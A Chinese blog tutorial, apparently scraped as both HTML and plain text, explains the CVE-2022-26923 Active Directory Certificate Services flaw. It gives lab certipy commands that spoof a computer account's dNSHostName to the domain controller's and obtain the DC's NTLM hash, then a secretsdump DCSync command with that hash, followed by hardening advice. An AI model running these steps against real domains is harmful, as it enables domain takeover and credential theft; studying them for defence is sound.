CVE-2022-26923域控证书服务（ADCS）

<h2>一、背景知识</h2> <h3>1、PKI公钥基础设施</h3> <p>PKI（Public Key Infrastructure）公钥基础设施，是提供公钥加密和数字签名服务的系统或平台，是一个包括硬件、软件、人员、策略和规程的集合，用来实现基于公钥密码体制的密钥和证书的产生、管理、存储、分发和撤销等功能。企业通过采用 PKI 框架管理密钥和证书可以建立一个安全的网络环境。</p> <p>PKI的基础技术包括：公钥加密、数字签名、数据完整性机制、数字信封(混合加密)、双重数字签名等。</p> <p>PKI体系能够实现的功能有：</p> <ul> <li>身份验证</li> <li>数据完整性</li> <li>数据机密性</li> <li>操作的不可否认性</li> </ul> <p>微软的活动目录证书服务<strong>ADCS就是对PKI的实现</strong>，活动目录证书服务能够跟现有的活动目录域服务ADDS进行结合，可以用于身份验证、公钥加密和数字签名等。ADCS提供所有与PKI相关的组件作为角色服务。每个角色服务负责证书基础架构的特定部分，同时协同工作以形成完整的解决方案。</p> <h3>2、CA证书颁发机构</h3> <p>CA（Certificate Authority，证书颁发机构）是PKI系统的核心。其作用包括处理证书申请、证书发放、证书更新、管理已颁发的证书、吊销证书和发布证书吊销列表(CRL)等。</p> <p>Active Directory证书服务中的CA有企业CA和独立CA。企业CA必须是域成员，并且通常处于联机状态以颁发证书或证书策略。而独立CA可以是成员、工作组或域。独立CA不需要ADDS活动目录域服务，并且可以在没有网络的情况下使用。但是在域中基本都是使用企业CA，因为企业CA可以和活动目录域服务ADDS进行结合，其信息也存储在Active Directory数据库中。企业CA支持基于证书模块创建证书和自动注册证书。</p> <p>CA拥有公钥和私钥：</p> <ul> <li>私钥只有CA知道，私钥用于对颁发的证书进行数字签名</li> <li>公钥任何人都可以知道，公钥用于验证证书是否由CA颁发</li> </ul> <h3>3、PKINIT Kerberos认证</h3> <p>一般情况下Kerberos协议在AS-REQ请求过程中，是通过用户hash加密时间戳来进行Kerberos预身份认证。但ADCS服务可以和ADDS紧密搭配使用，所以利用证书也可以进行Kerberos预身份认证。</p> <blockquote> <p><a href="https://www.rfc-editor.org/rfc/rfc4556.html">RFC4556 Public Key Cryptography for Initial Authentication in Kerberos (PKINIT)</a> 引入了对Kerberos预身份验证的公钥加密技术支持，可以使用证书的私钥来进行Kerberos预身份认证。</p> </blockquote> <p>此外，为了支持连接到不支持Kerberos身份验证的网络服务的应用程序的NTLM身份验证，KDC会在PAC特权属性证书的PAC_CREDENTIAL_INFO缓冲区中返回用户的NTLM Hash，也就是说当使用证书进行Kerberos认证时，返回的票据的PAC中是包含用户的NTLM Hash的，而且无论以后用户如何更改密码，返回的NTLM Hash都是当前用户最新的。</p> <h4>（1）什么是PAC</h4> <p>PAC 通常指的是 "Privilege Attribute Certificate"，它与Kerberos认证协议相关。在Active Directory环境中，当用户或服务使用Kerberos进行身份验证时，PAC包含在Kerberos票证中（特别是在TGT和service ticket中）。</p> <p>以下是PAC的主要特点和内容：</p> <ul> <li> <p><strong>用户的安全标识符 (SID)</strong>：这是用户的唯一标识符，以及用户所属的所有组的SID。</p> </li> <li> <p><strong>用户的权限和组成员资格</strong>：这包括用户在域中的所有组成员资格，无论它们是直接的还是嵌套的。</p> </li> <li> <p><strong>身份验证信息</strong>：PAC包含关于用户的其他验证信息，这有助于服务确定用户的身份和权限。</p> </li> <li> <p><strong>加密</strong>：为了保证安全，PAC的内容是加密的，只有具有正确密钥的服务才能解密它。</p> </li> </ul> <p>PAC的存在有助于提高效率，因为一旦用户得到一个Kerberos票据，他们就不需要再次查询Active Directory来确定他们的权限或组成员资格。相反，这些信息都包含在PAC中，并随票据一起发送。</p> <p>然而，PAC也可能增加票据的大小，特别是当用户是很多组的成员时。这可能会导致一些问题，例如如果票据太大而不能适应网络包。为了解决这个问题，有时可能需要调整相关的配置或减少用户的组成员资格。</p> <p>总的来说，PAC是Kerberos在Active Directory环境中的一个重要组成部分，它帮助服务快速确定用户的权限和身份，而无需再次查询AD。</p> <h4>（2）什么是PKINIT</h4> <p>PKINIT（Public Key Cryptography for Initial Authentication）是Kerberos身份验证协议的一个扩展。它允许Kerberos的初始身份验证使用公钥加密技术，而不是传统的密码。</p> <p>具体来说，这是如何工作的：</p> <ul> <li> <p><strong>公钥证书</strong>：在PKINIT中，用户或服务拥有一个公钥证书（通常是X.509格式）。</p> </li> <li> <p><strong>初始身份验证</strong>：当用户尝试进行Kerberos身份验证时，他们可以使用其私钥对某些信息进行签名，然后将签名的信息与其公钥证书一起发送给KDC（Key Distribution Center）。KDC验证签名并检查证书的有效性（通常与信任的证书颁发机构列表进行比较）。</p> </li> <li> <p><strong>票据颁发</strong>：一旦KDC验证了用户的身份，它将像往常一样颁发一个TGT（Ticket Granting Ticket）。</p> </li> </ul> <p>这种方法的好处是：</p> <ul> <li><strong>增强的安全性</strong>：公钥加密技术提供了比传统密码更强大的安全性。</li> <li><strong>智能卡支持</strong>：PKINIT常常与智能卡结合使用。用户的证书和私钥存储在智能卡上，使得身份验证过程更为安全。</li> </ul> <p>缺点：</p> <ul> <li><strong>复杂性</strong>：部署和管理PKI（Public Key Infrastructure）可能会增加复杂性和开销。</li> <li><strong>依赖于证书</strong>：证书的过期、撤销或其他问题可能会导致身份验证失败。</li> </ul> <p>总之，PKINIT为Kerberos提供了一个更安全的身份验证方法，尤其是当结合使用智能卡时。</p> <h3>4、证书模板</h3> <p>证书模板Certificate Templates是CA证书颁发机构的一个组成部分，是证书策略中的重要元素，是用于证书注册、使用和管理的一组规则和格式。当CA收到对证书的请求时，必须对该请求应用一组规则和设置，以执行所请求的功能，例如证书颁发或更新。这些规则可以是简单的，也可以是复杂的，也可以适用于所有用户或特定的用户组。证书模板是在CA上配置并应用于传入证书请求的一组规则和设置。证书模板还向客户机提供了关于如何创建和提交有效的证书请求的说明。基于证书模板的证书只能由企业CA颁发。这些模板存储在活动目录域服务(ADDS)中，以供林中的每个CA使用。这允许CA始终能够访问当前标准模板，并确保跨林一致的应用。</p> <p>证书模板通过允许管理员发布已为选定任务预先配置的证书，可以大大简化管理证书颁发机构(CA)的任务。证书模板管理单元允许管理员执行以下任务：</p> <ul> <li>查看每个证书模板的属性</li> <li>复制和修改证书模板</li> <li>控制哪些用户和计算机可以读取模板并注册证书</li> <li>执行与证书模板相关的其他管理任务</li> </ul> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27a3e9eb." alt="" /></p> <h3>5、证书注册</h3> <p>不同权限的域用户，在注册证书时，只能注册对应的模板，在证书模板的安全属性中，可以看到哪些用户和组具有当前证书模板的注册权限，一个证书注册流程如下：</p> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27a4b572." alt="" /></p> <ul> <li> <p>客户端生成一对公、私钥</p> </li> <li> <p>客户端生成证书签名请求(CSR，Certificate Signing Request)，里面包含客户端生成的公钥以及请求的证书模板、请求的主体等信息。整个CSR用客户端的私钥签名，发送给CA。</p> </li> <li> <p>CA收到请求后，从中取出公钥对CSR进行签名校验。校验通过后判断客户端请求的证书模板是否存在，如果存在，根据证书模板中的属性判断请求的主体是否有权限申请该证书。如果有权限，则还要根据其他属性，如：发布要求、使用者名称、扩展来生成证书。</p> </li> <li> <p>CA使用其私钥签名生成的证书并发送给客户端。</p> </li> <li> <p>客户端存储该证书在系统中。</p> </li> </ul> <p>如果在安装ADCS服务的时候，勾选了“证书颁发机构Web注册”选项，那么则可以通过Web方式来申请证书，如果证书申请的Web页面支持NTLM认证（默认支持），则可能被NTLM中继攻击:</p> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27a5cf95." alt="" /></p> <p>通过域账号认证后登陆：</p> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27a66baa." alt="" /></p> <h4>（1）普通域账号注册证书</h4> <p>普通域账号申请证书时，ADCS服务器通过userPrincipalName或sAMAccountName属性查找对应用户，并返回PAC和用户Hash，而这两个属性在域内是唯一的，所以整个流程可确保一一对应关系：</p> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27a70f2a." alt="" /></p> <h4>（2）计算机账号注册证书</h4> <ul> <li> <p>计算机账号在没有设置dNSHostName属性时，ADCS服务器无法判断请求机器的身份，因此无法生成证书</p> </li> <li> <p>计算机账号设置dNSHostName了属性时，ADCS服务器根据dNSHostName属性的值来生成对应证书，在整个ADCS服务器生成机器证书的过程中，只有dNSHostName属性影响了证书所属机器的生成。</p> </li> <li> <p>KDC在收到机器账号PKINIT Kerberos认证时，KDC会取出证书中“使用者可选名称”中DNS Name的值，然后查询sAMAccountName属性对应的条目，用该条目的权限生成PAC，在这个过程并不会搜索和校验dNSHostName属性。</p> </li> <li> <p>因此只有dNSHostName属性影响ADCS服务器生成对应机器的证书，并且在域内dNSHostName属性并不具有唯一性，因此可以利用普通域用户创建一个新的计算机账号，然后修改该计算机账号的dNSHostName属性为域控计算机账号名，这样通过新添加的计算机账号申请证书，就可以欺骗ADCS返回域控计算机账号的NTLM哈希</p> </li> </ul> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27a7a2be." alt="" /></p> <h2>二、利用条件</h2> <ul> <li> <p>域控安装了证书服务</p> </li> <li> <p>具有一个有权限添加计算机账号的域账号，默认情况下每个普通域账号有添加10个计算机账号的权限</p> </li> <li> <p>计算机账号具有申请计算机模板证书权限，默认情况下具有这个权限<br /> <img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27a8a7fe." alt="" /></p> </li> <li> <p>CVE-2022-26923补丁没打</p> </li> <li> <p>无论是否开启了证书Web注册接口都可以打，因为通过rpc也可以注册证书</p> </li> </ul> <h2>三、利用过程</h2> <p><strong>测试环境：</strong></p> <table> <thead> <tr> <th>主机名</th> <th>主机IP</th> <th>主机账户</th> <th>主机描述</th> </tr> </thead> <tbody> <tr> <td>dc-main-1.qiuqiu.com</td> <td>10.10.10.10</td> <td>qiuqiu.com\domain_admin</td> <td>主域</td> </tr> <tr> <td>user1.qiuqiu.com</td> <td>10.100.0.6</td> <td>qiuqiu.com\yefan</td> <td>普通域内机器，被攻击者控制</td> </tr> </tbody> </table> <h3>1、定位ADCS服务以及CA根证书</h3> <p>获取到ADCS服务器地址为<code>dc-main-1.qiuqiu.com</code>，CA根证书名为<code>qiuqiu-DC-MAIN-1-CA</code></p> <pre><code>certutil -dump -v</code></pre> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27a943c8." alt="" /></p> <p>如果攻击者在域外，可以使用<code>certipy</code>工具定位，除了明文账密，也支持PTH方式认证：</p> <pre><code>// pip安装 pip3 install certipy-ad certipy find -u yefan@qiuqiu.com -p Test1234 -dc-ip 10.10.10.10 -debug</code></pre> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27a9dd35." alt="" /></p> <h3>2、创建计算机账号并设置dnshostname属性</h3> <pre><code>certipy account create -u yefan@qiuqiu.com -p Test1234 -dc-ip 10.10.10.10 -user "fake_cert" -pass Test1234 -dns dc-main-1.qiuqiu.com -debug</code></pre> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27aa6211." alt="" /></p> <p>可以在域控上看到，新添加的计算机账号，dnshostname字段与当前账号名不匹配：</p> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27aaf67a." alt="" /></p> <h3>3、使用计算机账号申请计算机模板证书</h3> <p>使用之前新创建的计算机账号认证，并使用ADCS中的CA根证书为当前计算机账号签发一个计算机模板的证书，可以看到，当证书申请成功后，返回的dnshostname字段为域控计算机账号：</p> <pre><code>certipy req -u fake_cert$ -p Test1234 -dc-ip 10.10.10.10 -ca qiuqiu-DC-MAIN-1-CA -template Machine -debug</code></pre> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27ab9e63." alt="" /></p> <p>在域控上可以看到新颁发的计算机账号证书：</p> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27ac2d3d." alt="" /></p> <h3>4、使用证书进行kerberos认证并获得对应用户的NTLM哈希</h3> <p>使用计算机账号证书通过kerberos认证后，会返回对应用户的TGT票据，在TGT中的PAC中，包含了用户的NTLM哈希</p> <pre><code>certipy auth -pfx dc-main-1.pfx -dc-ip 10.10.10.10 -debug</code></pre> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27acb407." alt="" /></p> <h3>5、dcsync域控hash</h3> <pre><code>secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:6ccc4c07fe69157e48976165a273b13b "qiuqiu.com/dc-main-1$@10.10.10.10"</code></pre> <p><img src="http://weizn.net/wp-content/uploads/2026/05/post-1020-69fda27ad4a32." alt="" /></p> <p>获取到域管以及krbtgt账号的hash，后续利用不再赘述。</p> <h2>四、加固方案</h2> <ul> <li> <p>禁用普通域用户创建计算机账号</p> </li> <li> <p>如无需要，禁用普通域用户，以及计算机账号创建证书</p> </li> <li> <p>打补丁</p> </li> </ul>

一、背景知识

1、PKI公钥基础设施

PKI（Public Key Infrastructure）公钥基础设施，是提供公钥加密和数字签名服务的系统或平台，是一个包括硬件、软件、人员、策略和规程的集合，用来实现基于公钥密码体制的密钥和证书的产生、管理、存储、分发和撤销等功能。企业通过采用 PKI 框架管理密钥和证书可以建立一个安全的网络环境。

PKI的基础技术包括：公钥加密、数字签名、数据完整性机制、数字信封(混合加密)、双重数字签名等。

PKI体系能够实现的功能有：

身份验证
数据完整性
数据机密性
操作的不可否认性

微软的活动目录证书服务ADCS就是对PKI的实现，活动目录证书服务能够跟现有的活动目录域服务ADDS进行结合，可以用于身份验证、公钥加密和数字签名等。ADCS提供所有与PKI相关的组件作为角色服务。每个角色服务负责证书基础架构的特定部分，同时协同工作以形成完整的解决方案。

2、CA证书颁发机构

CA（Certificate Authority，证书颁发机构）是PKI系统的核心。其作用包括处理证书申请、证书发放、证书更新、管理已颁发的证书、吊销证书和发布证书吊销列表(CRL)等。

Active Directory证书服务中的CA有企业CA和独立CA。企业CA必须是域成员，并且通常处于联机状态以颁发证书或证书策略。而独立CA可以是成员、工作组或域。独立CA不需要ADDS活动目录域服务，并且可以在没有网络的情况下使用。但是在域中基本都是使用企业CA，因为企业CA可以和活动目录域服务ADDS进行结合，其信息也存储在Active Directory数据库中。企业CA支持基于证书模块创建证书和自动注册证书。

CA拥有公钥和私钥：

私钥只有CA知道，私钥用于对颁发的证书进行数字签名
公钥任何人都可以知道，公钥用于验证证书是否由CA颁发

3、PKINIT Kerberos认证

一般情况下Kerberos协议在AS-REQ请求过程中，是通过用户hash加密时间戳来进行Kerberos预身份认证。但ADCS服务可以和ADDS紧密搭配使用，所以利用证书也可以进行Kerberos预身份认证。

RFC4556 Public Key Cryptography for Initial Authentication in Kerberos (PKINIT) 引入了对Kerberos预身份验证的公钥加密技术支持，可以使用证书的私钥来进行Kerberos预身份认证。

此外，为了支持连接到不支持Kerberos身份验证的网络服务的应用程序的NTLM身份验证，KDC会在PAC特权属性证书的PAC_CREDENTIAL_INFO缓冲区中返回用户的NTLM Hash，也就是说当使用证书进行Kerberos认证时，返回的票据的PAC中是包含用户的NTLM Hash的，而且无论以后用户如何更改密码，返回的NTLM Hash都是当前用户最新的。

（1）什么是PAC

PAC 通常指的是 "Privilege Attribute Certificate"，它与Kerberos认证协议相关。在Active Directory环境中，当用户或服务使用Kerberos进行身份验证时，PAC包含在Kerberos票证中（特别是在TGT和service ticket中）。

以下是PAC的主要特点和内容：

用户的安全标识符 (SID)：这是用户的唯一标识符，以及用户所属的所有组的SID。
用户的权限和组成员资格：这包括用户在域中的所有组成员资格，无论它们是直接的还是嵌套的。
身份验证信息：PAC包含关于用户的其他验证信息，这有助于服务确定用户的身份和权限。
加密：为了保证安全，PAC的内容是加密的，只有具有正确密钥的服务才能解密它。

PAC的存在有助于提高效率，因为一旦用户得到一个Kerberos票据，他们就不需要再次查询Active Directory来确定他们的权限或组成员资格。相反，这些信息都包含在PAC中，并随票据一起发送。

然而，PAC也可能增加票据的大小，特别是当用户是很多组的成员时。这可能会导致一些问题，例如如果票据太大而不能适应网络包。为了解决这个问题，有时可能需要调整相关的配置或减少用户的组成员资格。

总的来说，PAC是Kerberos在Active Directory环境中的一个重要组成部分，它帮助服务快速确定用户的权限和身份，而无需再次查询AD。

（2）什么是PKINIT

PKINIT（Public Key Cryptography for Initial Authentication）是Kerberos身份验证协议的一个扩展。它允许Kerberos的初始身份验证使用公钥加密技术，而不是传统的密码。

具体来说，这是如何工作的：

公钥证书：在PKINIT中，用户或服务拥有一个公钥证书（通常是X.509格式）。
初始身份验证：当用户尝试进行Kerberos身份验证时，他们可以使用其私钥对某些信息进行签名，然后将签名的信息与其公钥证书一起发送给KDC（Key Distribution Center）。KDC验证签名并检查证书的有效性（通常与信任的证书颁发机构列表进行比较）。
票据颁发：一旦KDC验证了用户的身份，它将像往常一样颁发一个TGT（Ticket Granting Ticket）。

这种方法的好处是：

增强的安全性：公钥加密技术提供了比传统密码更强大的安全性。
智能卡支持：PKINIT常常与智能卡结合使用。用户的证书和私钥存储在智能卡上，使得身份验证过程更为安全。

缺点：

复杂性：部署和管理PKI（Public Key Infrastructure）可能会增加复杂性和开销。
依赖于证书：证书的过期、撤销或其他问题可能会导致身份验证失败。

总之，PKINIT为Kerberos提供了一个更安全的身份验证方法，尤其是当结合使用智能卡时。

4、证书模板

证书模板Certificate Templates是CA证书颁发机构的一个组成部分，是证书策略中的重要元素，是用于证书注册、使用和管理的一组规则和格式。当CA收到对证书的请求时，必须对该请求应用一组规则和设置，以执行所请求的功能，例如证书颁发或更新。这些规则可以是简单的，也可以是复杂的，也可以适用于所有用户或特定的用户组。证书模板是在CA上配置并应用于传入证书请求的一组规则和设置。证书模板还向客户机提供了关于如何创建和提交有效的证书请求的说明。基于证书模板的证书只能由企业CA颁发。这些模板存储在活动目录域服务(ADDS)中，以供林中的每个CA使用。这允许CA始终能够访问当前标准模板，并确保跨林一致的应用。

证书模板通过允许管理员发布已为选定任务预先配置的证书，可以大大简化管理证书颁发机构(CA)的任务。证书模板管理单元允许管理员执行以下任务：

查看每个证书模板的属性
复制和修改证书模板
控制哪些用户和计算机可以读取模板并注册证书
执行与证书模板相关的其他管理任务

5、证书注册

不同权限的域用户，在注册证书时，只能注册对应的模板，在证书模板的安全属性中，可以看到哪些用户和组具有当前证书模板的注册权限，一个证书注册流程如下：

客户端生成一对公、私钥
客户端生成证书签名请求(CSR，Certificate Signing Request)，里面包含客户端生成的公钥以及请求的证书模板、请求的主体等信息。整个CSR用客户端的私钥签名，发送给CA。
CA收到请求后，从中取出公钥对CSR进行签名校验。校验通过后判断客户端请求的证书模板是否存在，如果存在，根据证书模板中的属性判断请求的主体是否有权限申请该证书。如果有权限，则还要根据其他属性，如：发布要求、使用者名称、扩展来生成证书。
CA使用其私钥签名生成的证书并发送给客户端。
客户端存储该证书在系统中。

如果在安装ADCS服务的时候，勾选了“证书颁发机构Web注册”选项，那么则可以通过Web方式来申请证书，如果证书申请的Web页面支持NTLM认证（默认支持），则可能被NTLM中继攻击:

通过域账号认证后登陆：

（1）普通域账号注册证书

普通域账号申请证书时，ADCS服务器通过userPrincipalName或sAMAccountName属性查找对应用户，并返回PAC和用户Hash，而这两个属性在域内是唯一的，所以整个流程可确保一一对应关系：

（2）计算机账号注册证书

计算机账号在没有设置dNSHostName属性时，ADCS服务器无法判断请求机器的身份，因此无法生成证书
计算机账号设置dNSHostName了属性时，ADCS服务器根据dNSHostName属性的值来生成对应证书，在整个ADCS服务器生成机器证书的过程中，只有dNSHostName属性影响了证书所属机器的生成。
KDC在收到机器账号PKINIT Kerberos认证时，KDC会取出证书中“使用者可选名称”中DNS Name的值，然后查询sAMAccountName属性对应的条目，用该条目的权限生成PAC，在这个过程并不会搜索和校验dNSHostName属性。
因此只有dNSHostName属性影响ADCS服务器生成对应机器的证书，并且在域内dNSHostName属性并不具有唯一性，因此可以利用普通域用户创建一个新的计算机账号，然后修改该计算机账号的dNSHostName属性为域控计算机账号名，这样通过新添加的计算机账号申请证书，就可以欺骗ADCS返回域控计算机账号的NTLM哈希

二、利用条件

域控安装了证书服务
具有一个有权限添加计算机账号的域账号，默认情况下每个普通域账号有添加10个计算机账号的权限
计算机账号具有申请计算机模板证书权限，默认情况下具有这个权限
CVE-2022-26923补丁没打
无论是否开启了证书Web注册接口都可以打，因为通过rpc也可以注册证书

三、利用过程

测试环境：

主机名	主机IP	主机账户	主机描述
dc-main-1.qiuqiu.com	10.10.10.10	qiuqiu.com\domain_admin	主域
user1.qiuqiu.com	10.100.0.6	qiuqiu.com\yefan	普通域内机器，被攻击者控制

1、定位ADCS服务以及CA根证书

获取到ADCS服务器地址为dc-main-1.qiuqiu.com，CA根证书名为qiuqiu-DC-MAIN-1-CA

certutil -dump -v

如果攻击者在域外，可以使用certipy工具定位，除了明文账密，也支持PTH方式认证：

// pip安装
pip3 install certipy-ad

certipy find -u yefan@qiuqiu.com -p Test1234 -dc-ip 10.10.10.10 -debug

2、创建计算机账号并设置dnshostname属性

certipy account create -u yefan@qiuqiu.com -p Test1234 -dc-ip 10.10.10.10 -user "fake_cert" -pass Test1234 -dns dc-main-1.qiuqiu.com -debug

可以在域控上看到，新添加的计算机账号，dnshostname字段与当前账号名不匹配：

3、使用计算机账号申请计算机模板证书

使用之前新创建的计算机账号认证，并使用ADCS中的CA根证书为当前计算机账号签发一个计算机模板的证书，可以看到，当证书申请成功后，返回的dnshostname字段为域控计算机账号：

certipy req -u fake_cert$ -p Test1234 -dc-ip 10.10.10.10 -ca qiuqiu-DC-MAIN-1-CA -template Machine -debug

在域控上可以看到新颁发的计算机账号证书：

4、使用证书进行kerberos认证并获得对应用户的NTLM哈希

使用计算机账号证书通过kerberos认证后，会返回对应用户的TGT票据，在TGT中的PAC中，包含了用户的NTLM哈希

certipy auth -pfx dc-main-1.pfx -dc-ip 10.10.10.10 -debug

5、dcsync域控hash

secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:6ccc4c07fe69157e48976165a273b13b "qiuqiu.com/dc-main-1$@10.10.10.10"

获取到域管以及krbtgt账号的hash，后续利用不再赘述。

四、加固方案

禁用普通域用户创建计算机账号
如无需要，禁用普通域用户，以及计算机账号创建证书
打补丁

打赏